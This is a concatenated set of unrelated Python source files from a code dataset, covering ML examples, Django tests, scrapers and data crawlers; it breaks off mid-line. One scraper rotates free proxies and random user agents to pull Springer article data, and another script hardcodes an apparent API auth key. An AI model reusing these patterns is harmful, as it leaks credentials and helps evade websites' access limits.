blank=True, to=settings.AUTH_USER_MODEL, null=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"launcher/deployment/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"377476959","text":"import os\n#os.environ['TF_CPP_MIN_LOG_LEVEL']='2' #silence SSE warnings\nimport tensorflow as tf\nprint(tf.__version__)\nimport itertools\nimport numpy as np\nfrom numpy import genfromtxt\n#tf.logging.set_verbosity(tf.logging.ERROR) #supressing more warnings\n\nfeatures = [tf.contrib.layers.real_valued_column(\"x\", dimension=5)]\n\nestimator = tf.contrib.learn.LinearRegressor(feature_columns=features)\n\ncsvData = genfromtxt('cpuData.data', delimiter=',')\nprices = []\nfor x in np.array(csvData[:,4]):\n prices.append([x])\ndataNoPrices = np.array(csvData[:,:4]).astype(dtype=np.float32)\nprices = np.array(prices).astype(dtype=np.float32)\n\n#data from userbenchmark.com\n#intel -> 1, AMD ->0\n#data is [make, cores, thread, clock rate]\n#train first 60 data points\nx_train = dataNoPrices[:60]\ny_train = prices[:60]\n\n#evaluate the next group\nx_eval = dataNoPrices[61:len(dataNoPrices) - 1]\ny_eval = prices[61:len(prices) - 1]\n\n#print out prediction on last data point\n\nx_prediction = np.array([dataNoPrices[len(dataNoPrices) - 1]])\ny_prediction = prices[len(prices) - 1]\n\n\n\ninputFN = tf.contrib.learn.io.numpy_input_fn({\"x\":x_train}, y_train, batch_size=4, num_epochs=1000)\nevalInputFN = tf.contrib.learn.io.numpy_input_fn({\"x\":x_eval}, y_eval, batch_size=4, num_epochs=1000)\npredictionFN = tf.contrib.learn.io.numpy_input_fn({\"x\":x_prediction}, y_prediction, batch_size=1,num_epochs=1000)\n\nestimator.fit(input_fn=inputFN, steps=1000)\n\n# Evaluation\ntrain_loss = estimator.evaluate(input_fn=inputFN)\neval_loss = estimator.evaluate(input_fn=evalInputFN)\nprint(\"train loss: %r\"% train_loss)\nprint(\"eval loss: %r\"% eval_loss)\niterablePredictions = estimator.predict(input_fn=predictionFN)\npredictions = list(itertools.islice(iterablePredictions, len(x_prediction)))\nprint (\"Prediction: {}\".format(str(predictions)))\nprint(\"Actual -> %r\"% y_prediction)\n\n","sub_path":"cpu_linear_predictor.py","file_name":"cpu_linear_predictor.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"274353786","text":"# http://scikit-learn.sourceforge.net/0.6/auto_examples/applications/plot_face_recognition.html\n\nimport sys\nimport os\n\n# set working directory\nif sys.platform == 'win32':\n\tos.chdir('C:/Users/LUIJK01/Documents/GitHub/FaceRecognition')\nelse:\n\tos.chdir('/Users/rluijk/Documents/GitHub/FaceRecognition')\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nfrom sklearn.metrics import classification_report\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.svm import SVC\n\n# read data\nx_train = np.loadtxt('data/x_train_pca.csv', delimiter = ',')\nx_test = np.loadtxt('data/x_test_pca.csv', delimiter = ',')\ny_train = np.loadtxt('data/y_train.csv', delimiter = ',')\ny_test = np.loadtxt('data/y_test.csv', delimiter = ',')\n\n# parameters\nparams = {\n 'C' : 10**np.linspace(-8, -4, num = 50)\n}\n\n# initialize object\nclf = GridSearchCV(estimator = SVC(kernel = 'linear'), param_grid = params, cv = 5)\n\n# fit data\nclf.fit(x_train, y_train)\n\n# best parameters\nprint(clf.best_params_)\n\n# all parameters and accuracies\ndf = pd.DataFrame({\n 'C': [x['C'] for x in clf.cv_results_['params']],\n 'score': clf.cv_results_['mean_test_score']\n})\nprint(df)\nsns.pointplot(x = 'C', y = 'score', data = df)\n\n# predict test set\nypred = clf.predict(x_test)\nprint(classification_report(y_pred = ypred, y_true = y_test)) # 0.8\n","sub_path":"svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"122119843","text":"# coding: utf-8\n\n# Standard Python libraries\nfrom datetime import date\n\n# https://github.com/usnistgov/atomman\nimport atomman.lammps as lmp\n\ndef test_lammps_versions(commands):\n \"\"\"\n Tests the primary and alternative lammps commands listed in the loaded \n commands file. Only works when called on the machine where the executables\n are accessible, i.e. don't use if preparing on a different resource!\n Issues an error if the primary lammps command is inaccessible or too old.\n Ignores alternate lammps commands if they are inaccessible or not in the\n required date range.\n \n lammps_command - must be 30 Oct 2019 or newer.\n lammps_command_snap_1 - must be between 8 Aug 2014 and 30 May 2017.\n lammps_command_snap_2 - must be between 3 Dec 2018 and 12 Jun 2019.\n lammps_command_old - must be before 30 Oct 2019.\n\n Parameters\n ----------\n commands : dict\n The mpi and lammps commands to use when preparing.\n \"\"\"\n \n # Test main LAMMPS command\n lammps_command = commands['lammps_command']\n lammpsdate = lmp.checkversion(lammps_command)['date']\n assert lammpsdate >= date(2019, 10, 30)\n\n # Define test for older LAMMPS commands\n def test_old(commands, key, startdate=None, enddate=None):\n if key in commands:\n command = commands[key]\n else:\n return True\n\n try:\n lammpsdate = lmp.checkversion(command)['date']\n except:\n print(f'{key} not found or not working')\n else:\n if startdate is not None and lammpsdate < startdate:\n print(f'{key} too old')\n elif enddate is not None and lammpsdate > enddate:\n print(f'{key} too new')\n else:\n return True\n return False\n\n # Test older LAMMPS commands\n if not test_old(commands, 'lammps_command_snap_1', date(2014, 8, 8), date(2017, 5, 30)):\n del commands['lammps_command_snap_1']\n if not test_old(commands, 'lammps_command_snap_2', date(2018, 12, 3), date(2019, 6, 12)):\n del commands['lammps_command_snap_2']\n if not test_old(commands, 'lammps_command_old', None, date(2019, 10, 30)): \n del commands['lammps_command_old']","sub_path":"iprPy/workflow/test_lammps_versions.py","file_name":"test_lammps_versions.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"241316891","text":"#74. Suppose you have a multiplication table that is N by N. That is, a 2D array where the value at the i-th row and j-th column is (i + 1) * (j + 1) (if 0-indexed) or i * j (if 1-indexed).\n\n# Given integers N and X, write a function that returns the number of times X appears as a value in an N by N multiplication table.\n\ndef multiplicationTable(n, x):\n # generate blank multiplication table:\n table = []\n for i in range(n):\n temp_list = []\n for j in range(n):\n temp_list.append(0)\n table.append(temp_list)\n\n # alter first row\n for i in range(n):\n table[0][i] = (i+1)\n\n # alter first column\n for i in range(n):\n table[i][0] = (i+1)\n\n # fill blank spaces in table\n i = 0\n while i < (n - 1):\n j = 0\n while j < (n - 1):\n table[i + 1][j + 1] = table[0][i + 1] * table[j + 1][0]\n j += 1\n i += 1\n\n # count number of appearances of x\n count = 0\n for i in table:\n for j in i:\n if j == x:\n count += 1\n\n return count\n\nprint(multiplicationTable(6, 12))\n","sub_path":"daily_coding_problem/problem74.py","file_name":"problem74.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"523582717","text":"from django.db import models\n\nfrom ..managers import SafeDeleteManager, SafeDeleteQueryset\nfrom ..models import SafeDeleteModel\n\n\nimport pytest\npytestmark = pytest.mark.django_db\n\nclass CustomQuerySet(SafeDeleteQueryset):\n\n def green(self):\n return self.filter(\n color='green'\n )\n\n\nclass CustomManager(SafeDeleteManager):\n _queryset_class = CustomQuerySet\n\n def green(self):\n \"\"\"Implemented here so ``green`` available as manager's method\n \"\"\"\n return self.get_queryset().green()\n\n\nchoices = (\n ('red', \"Red\"),\n ('green', \"Green\"),\n)\n\n\nclass CustomQuerySetModel(SafeDeleteModel):\n color = models.CharField(\n max_length=5,\n choices=choices\n )\n\n objects = CustomManager()\n\n # other manager to test custom QS using ``SafeDeleteManager.__init__``\n other_objects = SafeDeleteManager(CustomQuerySet)\n\ndef test_custom_queryset_original_behavior():\n \"\"\"Test whether creating a custom queryset works as intended.\"\"\"\n CustomQuerySetModel.objects.create(\n color=choices[0][0]\n )\n CustomQuerySetModel.objects.create(\n color=choices[1][0]\n )\n\n assert CustomQuerySetModel.objects.count() == 2\n assert CustomQuerySetModel.objects.green().count() == 1\n\ndef test_custom_queryset_custom_method():\n \"\"\"Test custom filters for deleted objects\"\"\"\n instance = _create_green_instance()\n instance.delete()\n\n deleted_only = CustomQuerySetModel.objects.deleted_only()\n\n # ensure deleted instances available\n assert deleted_only.count() == 1\n\n # and they can be custom filtered\n assert deleted_only.green().count() == 1\n\ndef test_custom_queryset_without_manager():\n \"\"\"Test whether custom queryset may be used without custom manager\n \"\"\"\n instance = _create_green_instance()\n instance.delete()\n\n # note that ``other_objects`` manager used\n deleted_only = CustomQuerySetModel.other_objects.deleted_only()\n\n # ensure deleted instances available\n assert deleted_only.count() == 1\n\n # and they can be custom filtered\n assert deleted_only.green().count() == 1\n\ndef _create_green_instance():\n \"\"\"Shortcut for creating instance with ``color == green``\n \"\"\"\n return CustomQuerySetModel.objects.create(color=choices[1][0])\n","sub_path":"safedelete/tests/test_custom_queryset.py","file_name":"test_custom_queryset.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"442771836","text":"from rest_framework.request import clone_request\n\ndef _check_arrays_for_method(serializers, method=None, action=None):\n for item in serializers:\n if isinstance(item, tuple):\n # if have tuple like (\"POST\", \"PUT\") or (\"list\", \"retrieve\")\n if (method in item) or (action in item):\n return item\n else:\n # if we have (i hope) string like \"GET\" or \"update\"\n if (method == item) or (action == item):\n return item\n\n return None\n\n\ndef _get_serializer_class(instance):\n\n _action = getattr(instance, 'action', None)\n _method = instance.request.method\n _serializers = instance.serializers\n\n _temp = _check_arrays_for_method(_serializers, _method, _action)\n\n if _temp is not None:\n serializer_name = _temp\n elif 'default' in _serializers:\n serializer_name = 'default'\n else:\n raise KeyError('No default serializer for %s and %s' % (_action, _method))\n\n return _serializers.get(serializer_name)\n\n\nclass MultiSerializerMixin(object):\n\n def get_serializer_class(self):\n return _get_serializer_class(self)\n\ndef _nested(self_instance, read_only=None, action=None, method=None):\n\n original_request = self_instance.request\n\n if read_only:\n assert action is None and method is None, \\\n 'No `method` and/or `action` params allowed when passing `read_only` = True'\n\n method = 'GET'\n action = 'retrieve'\n\n if method is None:\n method = original_request.method\n\n request_copy = clone_request(original_request, method)\n\n return {\n \"action\": action,\n \"request\": request_copy, # returning copy of readonly request\n \"kwargs\": self_instance.kwargs\n }","sub_path":"taskboard/common/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"532714622","text":"import argparse\nimport yaml\nimport logging\nfrom ubm.setup_logging import setup_logging\nfrom ubm.local_loader import LocalLoader\nfrom ubm.flickr_uploader import FlickrUploader\n\n# Setup global logging\nsetup_logging()\n\n\nclass Ubm(object):\n\n def __init__(self, loader, uploader):\n self.logger = logging.getLogger(__name__)\n self.loader = loader\n self.uploader = uploader\n\n def upload(self, root_path):\n self.uploader.upload(self.loader.load(root_path))\n\n\ndef main(args=None):\n logger = logging.getLogger(__name__)\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\",\n \"--conf\",\n required=True,\n help=\"configuration file\")\n if args is not None:\n args = parser.parse_args(args)\n else:\n args = parser.parse_args()\n\n with open(args.conf, 'r') as conf_file:\n conf = yaml.load(conf_file)\n\n loader = LocalLoader(FlickrUploader.SUPPORTED_IMAGE_FILE_TYPES)\n uploader = FlickrUploader(conf['flickr']['client_key'],\n conf['flickr']['client_secret'],\n conf['flickr']['resource_owner_key'],\n conf['flickr']['resource_owner_secret'])\n ubm = Ubm(loader, uploader)\n ubm.upload(conf['root_path'])\n# config= None\n# for loc in os.curdir, os.path.expanduser(\"~\"), \"/etc/myproject\", os.environ.get(\"MYPROJECT_CONF\"):\n# try: \n# with open(os.path.join(loc,\"myproject.conf\")) as source:\n# config.readfp( source )\n# except IOError:\n# pass\nif __name__ == '__main__':\n main()\n","sub_path":"ubm/ubm.py","file_name":"ubm.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"58077980","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport glob\nimport os\n\nos.chdir('Pictures')\nfruitTypes = os.listdir(\".\")\n# print(fruitTypes)\nos.chdir('..')\n\n\ndef prepare_X_Y(path):\n lbl = 0\n fruitList = glob.glob(path+fruitTypes[0]+'/*')\n # print(fruitList)\n # print('\\n\\n')\n fruits = np.array([np.array(cv2.resize(cv2.imread(fruit),(100,100))) for fruit in fruitList])\n x_y = np.array([[img,lbl] for img in fruits])\n # print(x_y.shape)\n lbl += 1\n rest = fruitTypes[1:]\n # print(rest)\n for f in rest:\n # print(f)\n fruitList = glob.glob(path + f + '/*')\n # print(fruitList)\n fruits = np.array([np.array(cv2.resize(cv2.imread(fruit),(100,100))) for fruit in fruitList])\n x_y = np.vstack((x_y,np.array([[img,lbl] for img in fruits])))\n # print(x_y.shape)\n lbl += 1\n # print(x_y.shape)\n # print x_y[:,1]\n np.random.shuffle(x_y)\n return x_y\nx_y_train = prepare_X_Y('Pictures/')\nx_y_test = prepare_X_Y('Validation/')\nfor i in range(36):\n plt.subplot(6,6,i+1,xticks=[],yticks=[])\n plt.imshow(x_y_train[i,0][:,:,[2,1,0]],interpolation='nearest',aspect='auto')\nplt.show()\n\n\nx_y_train = x_y_train\nx_y_test = x_y_test\n#\n# print(x_y_train.shape)\n# print(x_y_test.shape)\n\ndef divide_img_lbl(data):\n \"\"\" split data into image and label\"\"\"\n x = []\n y = []\n for [item,lbl] in data:\n x.append(item)\n y.append([lbl])\n x = np.array(x)\n y = np.array(y)\n return x,y\n\nx_train,y_train = divide_img_lbl(x_y_train)\n\n# print(x_train.shape)\n# print(y_train.shape)\n\nx_test,y_test = divide_img_lbl(x_y_test)\n\nprint(x_test.shape)\nprint(y_test.shape)\n\n# rescale [0,255] --> [0,1]\nx_train = x_train[0:10000].astype('float32')/255\nx_test = x_test[0:10000].astype('float32')/255\ny_train = y_train[0:10000]\ny_test = y_test [0:10000]\n# print x_train[0]\nbins = np.arange(0,36)\nlbl = fruitTypes\n# import seaborn as sns\n# sns.set()\n# plt.hist(y_train,bins,ec='black')\n# plt.xlabel('Labels')\n# plt.ylabel('Frequency')\n# plt.xticks(bins,lbl)\n# plt.show()\nimport keras\n\n# one Hot_Encoding\n# print y_train\nnum_classes = len(fruitTypes)\n# print len(y_train)\n# print y_train.max(),y_train.min()\n# print y_test.max(),y_test.min()\n# print num_classes\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\n\n\n# break trainset into trainset and validationset\n#take first 80% as train and 20% as validation\nuptill = int(len(x_train)*0.8)\n(x_train,x_valid) = x_train[:uptill],x_train[uptill:]\n(y_train,y_valid) = y_train[:uptill],y_train[uptill:]\n\nprint(x_train.shape)\nprint(x_valid.shape)\nprint(y_train.shape)\nprint(y_valid.shape)\n\n\n# create the model\n\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D,MaxPooling2D,Flatten,Dense,Dropout\n\nmodel2 = Sequential()\nmodel2.add(Conv2D(filters = 16,kernel_size=2,padding='same',activation='relu',input_shape=(100,100,3)))\nmodel2.add(MaxPooling2D(pool_size=2))\nmodel2.add(Conv2D(filters=32,kernel_size=2,padding='same',activation='relu'))\nmodel2.add(MaxPooling2D(pool_size=2))\nmodel2.add(Conv2D(filters=64,kernel_size=2,padding='same',activation='relu'))\nmodel2.add(MaxPooling2D(pool_size=2))\nmodel2.add(Conv2D(filters=128,kernel_size=2,padding='same',activation='relu'))\nmodel2.add(MaxPooling2D(pool_size=2))\n\nmodel2.add(Dropout(0.2))\nmodel2.add(Flatten())\nmodel2.add(Dense(1000,activation='relu'))\nmodel2.add(Dropout(0.2))\nmodel2.add(Dense(1200,activation='relu'))\nmodel2.add(Dropout(0.2))\nmodel2.add(Dense(1000,activation='relu'))\nmodel2.add(Dropout(0.2))\n\n\nmodel2.add(Dense(3,activation='softmax'))\n# model2.summary()\n\n#compile the model\nmodel2.compile(loss='mean_squared_error', optimizer='rmsprop',metrics=['accuracy'])\nfrom keras.callbacks import ModelCheckpoint\n# checkpointer = ModelCheckpoint(filepath='modelFruit.weights.best.hdf5', verbose=1,\n# save_best_only=True)\n# hist = model2.fit(x_train,y_train,batch_size=32,epochs=100,validation_data=(x_valid,y_valid),callbacks=[checkpointer],verbose=2,shuffle=True)\n\n# load weight with best validation score\nmodel2.load_weights('modelFruit.weights.best.hdf5')\n\nscore = model2.evaluate(x_test,y_test,verbose=0)\nprint('test accuracy',score[1])\n\nLabels = fruitTypes\nprint(Labels)\nprint(x_test.shape)\ny_hat = (model2.predict(x_test))\nfor i in range(25):\n plt.subplot(5,5,i+1,xticks=[],yticks=[])\n plt.imshow(np.squeeze(x_test[i][:,:,[2,1,0]]))\n pred_idx = np.argmax(y_hat[i])\n true_idx = np.argmax(y_test[i])\n plt.title(\"{} ({})\".format(Labels[pred_idx],Labels[true_idx] ),color=(\"green\" if pred_idx == true_idx else \"red\"))\n# plt.tight_layout()\nplt.show()\n","sub_path":"ClassifyFruit.py","file_name":"ClassifyFruit.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"124804638","text":"from main import *\r\nclass Bullet(object):\r\n\tdef __init__(self, x,y, speed=8 ):\r\n\t\tself.x=x\r\n\t\tself.y=y\r\n\t\tself.speed=speed\r\n\r\n\tdef move(self):\r\n\t\tself.x+= self.speed\r\n\t\tif self.x <= display_width:\r\n\t\t\tdisplay.blit(shot_img, (self.x,self.y))\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False","sub_path":"bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"494087837","text":"from bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nimport time\nimport csv\nimport requests\nimport random\nfrom FreeProxy.proxytool import proxytool\nfrom fake_useragent import UserAgent\n\ndef get_ip():\n ip_list = proxytool().get(num=1)\n ip_touple = ip_list[0]\n ip_head = ip_touple[0]\n ip_last = ip_touple[1]\n proxy_info = {'host': ip_head, 'port': ip_last}\n return proxy_info\n\ndef get(str,csv_write,HEADERS,out,proxy_info):\n\trow = []\n\tresult_req = requests.get(str, headers=HEADERS,proxies=proxy_info)\n\tresultsoup = BeautifulSoup(result_req.text, features='lxml')\n\ttitle = resultsoup.find('h1', {\"class\":\"ArticleTitle\"})\n\tauthors = resultsoup.find_all('span', {\"class\":\"authors__name\"})\n\tabstract_a = resultsoup.find('p', {\"class\":\"Para\"})\n\ttime = resultsoup.find_all('time')\n\tif title is None :\n\t\ttitle = 'null'\n\t\trow.append(title)\n\telse:\n\t\trow.append(title.get_text())\n\tif len(authors) ==0 :\n\t\tauthor_list = 'null'\n\t\trow.append(author_list)\n\telse:\n\t\tauthor_list = authors[0].get_text()\n\t\tfor j in range(1,len(authors)):\n\t\t\tauthor_list=author_list+' '+authors[j].get_text()\n\t\trow.append(author_list)\n\tif len(time)<2:\n\t\ttime = 'null'\n\t\trow.append(time)\n\telse:\n\t\trow.append(time[1].get_text())\n\tif abstract_a is None :\n\t\tabstract_a = 'null'\n\t\trow.append(abstract_a)\n\telse:\n\t\trow.append(abstract_a.get_text())\n\tprint(row)\n\tcsv_write.writerow(row)\n\tout.flush()\n\ndef if_have_next(Volumeurl,HEADERS,proxies2):\n\tVolume_req = requests.get(Volumeurl[-1], headers=HEADERS,proxies=proxies2)\n\tVolumesoup = BeautifulSoup(Volume_req.text, features='lxml')\n\tnext = Volumesoup.find('a',{'class':'next'})\n\treturn next\n\n\n# url获取\n\n\nif __name__ == '__main__':\n\t\n\tbaseurl=\"https://link.springer.com\"\n\tua = UserAgent()\n\tua = ua.random\n\tHEADERS = {\"User-Agent\":ua}\n\tout=open(\"/home/cbq/Desktop/scapiy/Hydrodynamics.csv\",'a',newline='')\n\tcsv_write=csv.writer(out,dialect='excel')\n\tArticle_sort = []\n\t# (31) 30 22\n\tcount = 0\n\tproxies2 = get_ip()\n\t#for i in range (25,22,-1):\n\t#\tfor j in range(1,6):\t\n\tVolumeurl = []\n\tfirstone = 'https://link.springer.com/journal/42241/31/1'\n\tVolumeurl.append(firstone)\n\tnext = firstone\n\t#count = count+1\n\t\t\t#if count % 5 == 0:\n\t\t\t#\tproxies2 = get_ip()\n\t\t\t#else:\n\t\t\t#\tpass\n\twhile next is not None:\t\n\t\tnext = if_have_next(Volumeurl,HEADERS,proxies2)\n\t\tif next is None:\n\t\t\tcontinue\n\t\telse:\n\t\t\tVolumeurl.append(baseurl+next.get('href'))\n\tif len(Volumeurl) > 1:\n\t\tfor t in Volumeurl:\n\t\t\tVolume_req = requests.get(t,headers=HEADERS,proxies=proxies2)\n\t\t\ttime.sleep(0.5)\n\t\t\tVolumesoup = BeautifulSoup(Volume_req.text, features='lxml')\n\t\t\tArticle = Volumesoup.find_all('h3',{\"class\":\"title\"})\n\t\t\tfor m in Article:\n\t\t\t\tArticleurl = m.find_all('a')\n\t\t\t\tfor a in Articleurl:\n\t\t\t\t\tArticle_sort.append(a.get('href'))\n\telse:\n\t\tVolume_req = requests.get(firstone,headers=HEADERS,proxies=proxies2)\n\t\tVolumesoup = BeautifulSoup(Volume_req.text, features='lxml')\n\t\tArticle = Volumesoup.find_all('h3',{\"class\":\"title\"})\n\t\tfor m in Article:\n\t\t\tArticleurl = m.find_all('a')\n\t\t\tfor a in Articleurl:\n\t\t\t\tArticle_sort.append(a.get('href'))\n\ttime.sleep(0.5)\n\t\t\t\t\t\n\tnum= 0\n\tproxies3 = get_ip()\n\tfor i in range(0,len(Article_sort)):\n\t\tnum= num+1\n\t\tprint(num)\n\t\turl_art = baseurl+Article_sort[i]\n\t\tprint(url_art)\n\t\tif num % 5 == 0:\n\t\t\tproxies3 = get_ip()\n\t\telse:\n\t\t\tpass\n\t\tget(url_art,csv_write,HEADERS,out,proxies3)\n\t\ttime.sleep(0.5)\n\tprint('over')\n\tout.close()\n","sub_path":"model/scrapy/Hydrodynamics.py","file_name":"Hydrodynamics.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"31022219","text":"from django.conf.urls import patterns, url\n\nfrom .views import (\n AccountDetails,\n AccountViewSet,\n AccountCurrentUser,\n AccountTimes,\n AccountAutocomplete,\n)\n\n\nurlpatterns = patterns(\n '',\n url(r'^$', AccountViewSet.as_view(), name='users'),\n url(\n r'^login/$',\n 'django.contrib.auth.views.login', {\n 'template_name': 'accounts/login.html'\n },\n name=\"login\"\n ),\n url(\n r'^me/$',\n AccountCurrentUser.as_view(),\n name='current_user'\n ),\n url(\n r'^logout/$',\n 'django.contrib.auth.views.logout', {\n 'next_page': '/'\n }, name=\"logout\"\n ),\n url(\n r'^(?P\\d+)/$',\n AccountDetails.as_view(),\n name='details'\n ),\n url(\n r'^(?P\\d+)/times/(?P\\d{4}-\\d{2}-\\d{2})$',\n AccountTimes.as_view(),\n name='user_times',\n ),\n url(\n r'^autocomplete/$',\n AccountAutocomplete.as_view(),\n name='autocomplete'\n ),\n)\n","sub_path":"tragile/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"592376956","text":"import urllib.request\r\nfrom bs4 import BeautifulSoup\r\nimport numpy as np\r\nimport pandas as pd\r\nimport re\r\nimport datetime\r\nimport os\r\n\r\ndir_path = os.path.dirname(os.path.realpath(__file__)) # get current file path for saving excel to same path later\r\n\r\nurl = \"https://www.worldometers.info/coronavirus/#countries\" # set target url\r\nuser_agent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7' # user agent\r\nheaders = {'User-Agent': user_agent} # add user agent to request header\r\n\r\n# request url content and read / parse response html\r\nrequest = urllib.request.Request(url, None, headers=headers)\r\nresponse = urllib.request.urlopen(request)\r\nhtml = response.read()\r\nsoup = BeautifulSoup(html, \"html.parser\")\r\n\r\n\"\"\"\r\n1st part looks for data only\r\n\"\"\"\r\n\r\ntable = soup.find(\"table\", {\"id\": \"main_table_countries_today\"}) # find table in html\r\nrows = table.findAll(\"td\") # find table content\r\n\r\ntable_cells = [] # define list for table cell content\r\n\r\n# get cell content from table using regular expression and append to list\r\nfor row in rows:\r\n row = str(row)\r\n covid_regex = re.compile(r\">+[+]?\\d*,?\\d*,?\\d*[.]?\\d*\\D*<+\")\r\n reg_result = covid_regex.search(row)\r\n try:\r\n table_cells.append(reg_result.group())\r\n except AttributeError:\r\n table_cells.append(\"EXCEPT ATTRIBUTE ERROR\")\r\n\r\ndata = [] # define list for cleaned table cell content\r\n\r\n# clean and append cell content to list\r\nfor cell in table_cells:\r\n try:\r\n data.append(float(cell.replace(\">\", \"\").replace(\"<\", \"\").replace(\"+\", \"\").replace(\",\", \"\")))\r\n except ValueError:\r\n data.append(cell[1:-1])\r\n\r\ndata = data[:-19] # delete last 13 entries (which are total rows in original table)\r\ndata_array = np.reshape(np.array(data), (-1, 19)) # reshape list to array of size 212 x 11\r\n\r\n# transform array to dataframe and add col names\r\ndf = pd.DataFrame(data_array, columns=[\"ID\", \"Country\", \"Total Cases\", \"New Cases\", \"Total Deaths\", \"New Deaths\",\r\n \"Total Recovered\", \"New Recovered\", \"Active Cases\", \"Serious, Critical\", \"Tot Cases/1M pop\",\r\n \"Deaths/ 1M pop\", \"Total Tests\", \"Tests/ 1M pop\", \"Population\", \"Continent\", \"1 Case every X people\",\r\n \"1 Death every X people\", \"1 Test every X ppl\"])\r\n\r\n\"\"\"\r\n2nd part cleans up country names and saves data to excel\r\n\"\"\"\r\n\r\nctry = df[\"Country\"].tolist() # get country data and save to list\r\nctry_clean = [] # define new list for cleaned data\r\nctry_regex = re.compile(r\">+\\w*-?.?\\s?\\w*\\s?\\w*\\s?\\w*<+\") # define regular expression to extract country name\r\n\r\n# iterate through ist and extract country name based on regex (+ filter for e.g. vessels)\r\nfor i in ctry:\r\n reg_result = ctry_regex.search(i)\r\n try:\r\n ctry_clean.append(reg_result.group()[1:-1])\r\n except AttributeError:\r\n ctry_clean.append(\"NO COUNTRY\")\r\ndf[\"Country\"] = ctry_clean # save cleaned country data to df\r\ndf = df[8:-7] # drop not needed rows (i.e. aggregated rows for continents)\r\ndf.reset_index(inplace=True)\r\ndf.drop([\"Population\", \"index\", \"ID\"], axis = 1, inplace=True)\r\ndf.to_csv(f\"{dir_path}\\\\{datetime.datetime.now().date()} COVID-19 worldwide.csv\", sep=\";\") # save data to excel\r\nprint(f\"Excel printed to {dir_path}!\") # show file location\r\n","sub_path":"COVID_Data_Crawler.py","file_name":"COVID_Data_Crawler.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"521063656","text":"# import math\n# import django\n# print(django.VERSION)\n# print('1.私の名前はPythonです.')\n# print('2.私の名前はPythonです.')\n# print('3.私の名前はPythonです.')\n# m=(1+1j)*(1-1j);\n# print(m);\n# m=math.sin(math.pi/2);\n# print(\"sin(90) = %.*f\" %(2,m));\n# m=math.sqrt(36);\n# print(m);\n\n# coding: utf -8\n\n# 必要なモジュールの読込み\n# import threading\n# import time\n#\n# # 第1 スレッド\n# def th_1(name ):\n# for i in range (8):\n# print(name)\n# time.sleep (1)\n#\n# # 第2 スレッド\n# def th_2(name ):\n# for i in range (3):\n# print('\\t',name)\n# time.sleep (2)\n#\n# # スレッドの生成\n# t1 = threading.Thread(target=th_1 , args=('Thread -1',))\n# t2 = threading.Thread(target=th_2 , args=('Thread -2',))\n# # スレッドの開始\n# t1.start ()\n# t2.start ()\n#\n# # スレッドの終了待ち\n# t2.join ()\n# print ('\\tThread -2 ended')\n# t1.join ()\n# print('Thread -1 ended')\n\nprint(\"x+3\")\ndef foo():\n return 18\nb=foo()\nprint('x = %d' %b)\nname = input('input your own name: \\r\\n');\nprint(\"Well, hello \", name)\n\nperson = input('Enter your name: ')\ngreeting = 'Hello, {}!'.format(person)\nprint(greeting)\n","sub_path":"test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"385506021","text":"from tba import tba\nimport numpy as np\nfrom match import Team, MatchQM\n\npitt_key, pembroke_key, ash_key = '2018ncgre', '2018ncpem', '2018ncash'\nforsyth_key, state_champs = '2018ncwin', '2018nccmp'\nnc_events = ['2018ncgre', '2018ncpem', '2018ncash', '2018ncwin', '2018nccmp']\nfnc_key = '2018nc'\ntba.auth_key = 'vbxm8opdrSZqgnjzor6lVtLuZKTpre4oo2WR3Zw8iS3NmmI9p1G83sgC59ZmB9eF'\nstates = MatchQM(state_champs)\n\nnc_teams = [Team.keyToNum(key) for key in tba._fetch('district/%s/teams/keys' % (fnc_key))]\nstate_teams = [Team.keyToNum(key) for key in tba._fetch('event/%s/teams/keys' % (state_champs))]\n\ntrain_data_file = open(\"training_data.txt\", \"w+\")\ntrain_labels_file = open(\"training_labels.txt\", \"w+\")\n\n# 32 teams, 10 features\n# 